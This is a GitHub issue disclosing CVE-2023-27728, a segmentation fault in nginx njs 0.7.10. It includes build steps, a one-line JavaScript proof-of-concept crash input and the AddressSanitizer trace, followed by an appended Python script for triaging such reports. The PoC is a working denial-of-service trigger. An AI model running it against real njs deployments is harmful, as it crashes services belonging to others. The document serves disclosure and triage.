CVE-2023-27728: SEGV src/njs_json.c in njs_dump_is_recursive · Issue #618 · nginx/njs
Nginx NJS v0.7.10 was discovered to contain a segmentation violation via the function njs_dump_is_recursive at src/njs_vmcode.c.
Closed
ret2ddme opened this issue
Feb 21, 2023
· 0 comments
Environment
commit: 4c1e23326e1c30e4e051bf588bfc1aaa63954976
version: 0.7.10
Build:
```
./configure --cc=clang --address-sanitizer=YES
make
```
Poc
```js
Object.defineProperty([], 'a', { configurable: true, enumerable: true, get: Object});
```
Asan
```
==31165==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000022 (pc 0x00000053426f bp 0x7ffef5d7b170 sp 0x7ffef5d7a3e0 T0)
==31165==The signal is caused by a READ memory access.
==31165==Hint: address points to the zero page.
    #0 0x53426f in njs_dump_is_recursive /root/njs/src/njs_json.c
    #1 0x53426f in njs_vm_value_dump /root/njs/src/njs_json.c:2113:13
    #2 0x4e0374 in njs_vm_retval_dump /root/njs/src/njs_vm.c:1004:12
    #3 0x4c984b in njs_console_output /root/njs/src/njs_shell.c:885:13
    #4 0x4cd050 in njs_process_output /root/njs/src/njs_shell.c:1010:9
    #5 0x4cad81 in njs_process_script /root/njs/src/njs_shell.c:960:5
    #6 0x4cb556 in njs_process_file /root/njs/src/njs_shell.c:678:11
    #7 0x4c94be in main /root/njs/src/njs_shell.c:335:15
    #8 0x7f1864672c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    #9 0x41f1d9 in _start (/root/njs/build/njs+0x41f1d9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /root/njs/src/njs_json.c in njs_dump_is_recursive
```
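For triaging reports like the one in this issue, the following added example (not part of the original issue or of the njs project) parses the ASan output into a summary: fault kind, faulting address, access type, whether the address falls in the first page, and a deduplication key built from the top three frames. The function name `triage`, the 4 KiB page size and the bucket format are assumptions made for this example.

```python
import re

# Excerpt of the ASan report quoted in the issue above (frames #3-#7 and #9 omitted).
REPORT = """\
==31165==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000022 (pc 0x00000053426f bp 0x7ffef5d7b170 sp 0x7ffef5d7a3e0 T0)
==31165==The signal is caused by a READ memory access.
==31165==Hint: address points to the zero page.
    #0 0x53426f in njs_dump_is_recursive /root/njs/src/njs_json.c
    #1 0x53426f in njs_vm_value_dump /root/njs/src/njs_json.c:2113:13
    #2 0x4e0374 in njs_vm_retval_dump /root/njs/src/njs_vm.c:1004:12
    #8 0x7f1864672c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
"""

HEADER = re.compile(r"ERROR: AddressSanitizer: (\S+) on unknown address (0x[0-9a-f]+)")
ACCESS = re.compile(r"caused by a (READ|WRITE) memory access")
FRAME = re.compile(r"^\s*#(\d+) 0x[0-9a-f]+ in (\S+)(?: (\S+))?", re.M)
PAGE_SIZE = 4096  # assumption: 4 KiB pages, matching ASan's "zero page" hint

def triage(report, depth=3):
    """Summarise an ASan 'unknown address' report and derive a dedup key."""
    head = HEADER.search(report)
    if head is None:
        raise ValueError("not an ASan 'unknown address' report")
    access = ACCESS.search(report)
    addr = int(head.group(2), 16)
    frames = []
    for _, func, loc in FRAME.findall(report):
        # Drop line:column, which shifts between commits; keep the file name.
        path = (loc or "").split(":")[0]
        frames.append((func, path.rsplit("/", 1)[-1]))
    return {
        "kind": head.group(1),
        "address": addr,
        "access": access.group(1) if access else "UNKNOWN",
        "near_null": addr < PAGE_SIZE,
        "bucket": "|".join(f"{fn}@{src}" for fn, src in frames[:depth]),
    }

if __name__ == "__main__":
    for key, value in triage(REPORT).items():
        print(key, value)
```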